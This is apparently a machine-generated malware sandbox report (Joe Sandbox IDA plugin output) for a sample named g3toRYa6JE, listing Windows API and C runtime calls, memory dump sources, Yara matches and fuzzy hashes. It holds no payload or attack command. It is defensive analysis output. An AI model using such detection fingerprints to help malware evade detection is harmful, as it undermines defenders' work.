                                                                                                                                                                                                                              • Instruction ID: 1a6205ac72ebf8d1688c9f65f809cb8e6d8ac8f7b7a09961daf7fc6283f763b0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6119032980704A7E522BFB2CC07FCB7BAD6F18305F40581EB6DA66052CA2CE5184B47
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 007BA321: _free.LIBCMT ref: 007BA34A
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007BA628
                                                                                                                                                                                                                                • Part of subcall function 007B36C1: HeapFree.KERNEL32(00000000,00000000,?,007BA34F,?,00000000,?,00000000,?,007BA5F3,?,00000007,?,?,007BA9E7,?), ref: 007B36D7
                                                                                                                                                                                                                                • Part of subcall function 007B36C1: GetLastError.KERNEL32(?,?,007BA34F,?,00000000,?,00000000,?,007BA5F3,?,00000007,?,?,007BA9E7,?,?), ref: 007B36E9
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007BA633
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007BA63E
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007BA692
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007BA69D
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007BA6A8
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007BA6B3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                              • Instruction ID: e82b3958a517cad10034b28a3a1d5f60b9764723894340f99be2fe50b1444976
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE11E971940B04FADA20BBB1CD4FFCB77DCEF04700FC04826B29DA71A2DA69B6548651
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 004123F0
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 004123F6
                                                                                                                                                                                                                              • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 00412423
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 0041242D
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 0041243F
                                                                                                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412455
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00412463
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4227777306-0
                                                                                                                                                                                                                              • Opcode ID: ba26f486df76d842dabe37b99459d44fccdc07bc3ddf0c1636ffc481c0617ea2
                                                                                                                                                                                                                              • Instruction ID: 5cfb26a65153cc27f48dfa9c0f225a7cd51ea371121a2632e0d6d729d80d374e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ba26f486df76d842dabe37b99459d44fccdc07bc3ddf0c1636ffc481c0617ea2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3201F738600121A7C720AF66ED09BEF3768AF42B52BA0443BF905D2151DBACD954866D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00790D90,?,?,?,00000000), ref: 00792657
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00790D90,?,?,?,00000000), ref: 0079265D
                                                                                                                                                                                                                              • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00790D90,?,?,?,00000000), ref: 0079268A
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00790D90,?,?,?,00000000), ref: 00792694
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00790D90,?,?,?,00000000), ref: 007926A6
                                                                                                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 007926BC
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 007926CA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4227777306-0
                                                                                                                                                                                                                              • Opcode ID: 6bc3ccd81d67fd1a20a10fcda5f24da638e68139e84298e1693e69c500751e62
                                                                                                                                                                                                                              • Instruction ID: 234ed40cd7a264f90e783741ae8b134646b984e4100d42eec85783c1ffa60718
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6bc3ccd81d67fd1a20a10fcda5f24da638e68139e84298e1693e69c500751e62
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF01DF38601105BBDF20BF61EC49BAF3B68AF42B52B600425F405D2862EB2CD90587A9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,007966FB), ref: 007924A6
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 007924B4
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 007924C2
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,007966FB), ref: 007924F0
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 007924F7
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,007966FB), ref: 00792512
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,007966FB), ref: 0079251E
                                                                                                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00792534
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00792542
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                              • String ID: kernel32.dll
                                                                                                                                                                                                                              • API String ID: 4179531150-1793498882
                                                                                                                                                                                                                              • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                                                                                                                                              • Instruction ID: 7dd414772e8c1469201d751869f9000bf9200396254499c6fc11c6d74168d432
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07F0A4769003107FEA117B797C8E91A3FACDE46B233214636F811D22A3EB79C901866C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C66D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Exception@8Throw
                                                                                                                                                                                                                              • String ID: <(@$<(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                              • API String ID: 2005118841-859722693
                                                                                                                                                                                                                              • Opcode ID: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                                                                                                                                                                              • Instruction ID: a061ea616c9574019159ec0f40f66c927ac9cef8fcde5d3cdfefebe65de0f9c0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9FF0FCB2900204AAC714DB54CC42FAB33985B11744F14857BEE11B61C3DA7DAD05C79C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                              • _memcmp.LIBVCRUNTIME ref: 0043115C
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004311CD
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004311E6
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00431218
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00431221
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043122D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorLast$_memcmp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4275183328-0
                                                                                                                                                                                                                              • Opcode ID: 1403a73044b2a32c4151c19e3ee42d3d20986d24228a641b3762fb9bf04db679
                                                                                                                                                                                                                              • Instruction ID: e2129b0906de41222375811faf8a10f30bb0ce812e5bc895f935e357d1a7b262
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1403a73044b2a32c4151c19e3ee42d3d20986d24228a641b3762fb9bf04db679
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BBB12975A012199FDB24DF18C894AAEB7B4FB18304F1086EEE949A7360D775AE90CF44
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,007B25DC,00000001,00000001,?), ref: 007B23E5
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,007B25DC,00000001,00000001,?,?,?,?), ref: 007B246B
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007B2565
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 007B2572
                                                                                                                                                                                                                                • Part of subcall function 007B38FE: RtlAllocateHeap.NTDLL(00000000,0078DACD,00000000), ref: 007B3930
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 007B257B
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 007B25A0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1414292761-0
                                                                                                                                                                                                                              • Opcode ID: 011fbe7e6b9632404c7d9c1a6e466163715f947e1f03c273384449d8668b7b41
                                                                                                                                                                                                                              • Instruction ID: 6f29c0c41f748e6eb3495bf5f698592c8e263a508a6c0312f89155b6aa5c6551
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 011fbe7e6b9632404c7d9c1a6e466163715f947e1f03c273384449d8668b7b41
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6512E72A01206ABDB259F64CC55FFE37A9EF44750B240668FC04D7062EB38DD62C660
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __cftoe
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4189289331-0
                                                                                                                                                                                                                              • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                                                                                                                                              • Instruction ID: 77627bbf44250dfcfb9202c0727899f00591c30e5d54495699eb30b9559ae29d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57510932900205EBDF249B68DC49FAE77ADAFCA334F644319F819D6182EB3CD9508664
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 007A3041
                                                                                                                                                                                                                                • Part of subcall function 00798AA2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 00798AAD
                                                                                                                                                                                                                              • SafeSQueue.LIBCONCRT ref: 007A305A
                                                                                                                                                                                                                              • Concurrency::location::_Assign.LIBCMT ref: 007A311A
                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 007A313B
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 007A3149
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3496964030-0
                                                                                                                                                                                                                              • Opcode ID: 17bd562b5d5d9d9cfdfa562d227ccadc57b46c4ced5fec5b9a2592468eba907b
                                                                                                                                                                                                                              • Instruction ID: 702de31a008db9df1baff4bde993b14904ff0087171b4468d108a90382df66b0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17bd562b5d5d9d9cfdfa562d227ccadc57b46c4ced5fec5b9a2592468eba907b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C310531600611DFCB65EF64C845B6AB7B5FF86710F104669F80A9B242DB38ED05CBD1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindSITargetTypeInstance.LIBVCRUNTIME ref: 007A8F67
                                                                                                                                                                                                                              • FindMITargetTypeInstance.LIBVCRUNTIME ref: 007A8F80
                                                                                                                                                                                                                              • FindVITargetTypeInstance.LIBVCRUNTIME ref: 007A8F87
                                                                                                                                                                                                                              • PMDtoOffset.LIBCMT ref: 007A8FA6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FindInstanceTargetType$Offset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1467055271-0
                                                                                                                                                                                                                              • Opcode ID: be68cb40e55dd2292cbbce737d8ca9aab969a3a65d4eb3b761b4647cdf86019d
                                                                                                                                                                                                                              • Instruction ID: bfbacb4b0d2472f3486ac5424c01fda01ed41d7de77b4cf639b356a6937e181a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: be68cb40e55dd2292cbbce737d8ca9aab969a3a65d4eb3b761b4647cdf86019d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4213B72604206DFCF54DF64DC4AE6E77A5EBC6720F24431AF91193581EF38E91086A2
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1687354797-0
                                                                                                                                                                                                                              • Opcode ID: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
                                                                                                                                                                                                                              • Instruction ID: 469cf26474c621ddbab61e3d0cd045d75e17c92834ca595dafb97c8e5450c12b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78217171C44248DADF11BBB8D849BEDBBF8AF09325F14402AE404B7282DB7C9D848B65
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00428DC1,00426752,00440690,00000008,004409F5,?,?,?,?,00423A3B,?,?,19CA2F35), ref: 00428DD8
                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DE6
                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428DFF
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00428DC1,00426752,00440690,00000008,004409F5,?,?,?,?,00423A3B,?,?,19CA2F35), ref: 00428E51
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                              • Opcode ID: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                                                                                                                                                                                              • Instruction ID: 758f7159784acd0a18ffe6e4d50e04bfafef725c819603ece3ff961fbf0e5b5e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E001F53230A7316EA6242BF57C8966B2744EB0577AB60033FF510902E2EE198C20554D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,007A9028,007A69B9,007C08F7,00000008,007C0C5C,?,?,?,?,007A3CA2,?,?,0045A064), ref: 007A903F
                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007A904D
                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007A9066
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,007A9028,007A69B9,007C08F7,00000008,007C0C5C,?,?,?,?,007A3CA2,?,?,0045A064), ref: 007A90B8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                              • Opcode ID: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                                                                                                                                                                                              • Instruction ID: 57fd39883224c44144fd0be23303b303cfa9a58b65b8b3032a37bf9937c3d3ac
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5701FC32109712BDA72427B46C8DA672744EBD77B5B30033AF620451F1EF1A8C319A95
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00404D59
                                                                                                                                                                                                                              • int.LIBCPMT ref: 00404D70
                                                                                                                                                                                                                                • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                                                                                                                                                • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 00404D79
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00404DAA
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DC0
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00404DDE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2243866535-0
                                                                                                                                                                                                                              • Opcode ID: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
                                                                                                                                                                                                                              • Instruction ID: 1dda4c75b92fe2b5e69280e9b804bb78dd99b554210e3ff263920cc003329bbf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A11A3B19001249BCB15EBA0C841AEE77B4AF54319F20053EE912B72D2DB7C9A0587DD
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00784FC0
                                                                                                                                                                                                                              • int.LIBCPMT ref: 00784FD7
                                                                                                                                                                                                                                • Part of subcall function 0078BFB9: std::_Lockit::_Lockit.LIBCPMT ref: 0078BFCA
                                                                                                                                                                                                                                • Part of subcall function 0078BFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 0078BFE4
                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 00784FE0
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00785011
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00785027
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00785045
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2243866535-0
                                                                                                                                                                                                                              • Opcode ID: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
                                                                                                                                                                                                                              • Instruction ID: 8a702f16f1fe4611452ade3291df543dc5be7d39fe721b135730c12300218765
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD11CE31980619DBCB21FBA4D80AAED77B0BF44311F240529F515AB2D2DF7C9E05CBA1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040C190
                                                                                                                                                                                                                              • int.LIBCPMT ref: 0040C1A7
                                                                                                                                                                                                                                • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                                                                                                                                                • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 0040C1B0
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 0040C1E1
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C1F7
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C215
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2243866535-0
                                                                                                                                                                                                                              • Opcode ID: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
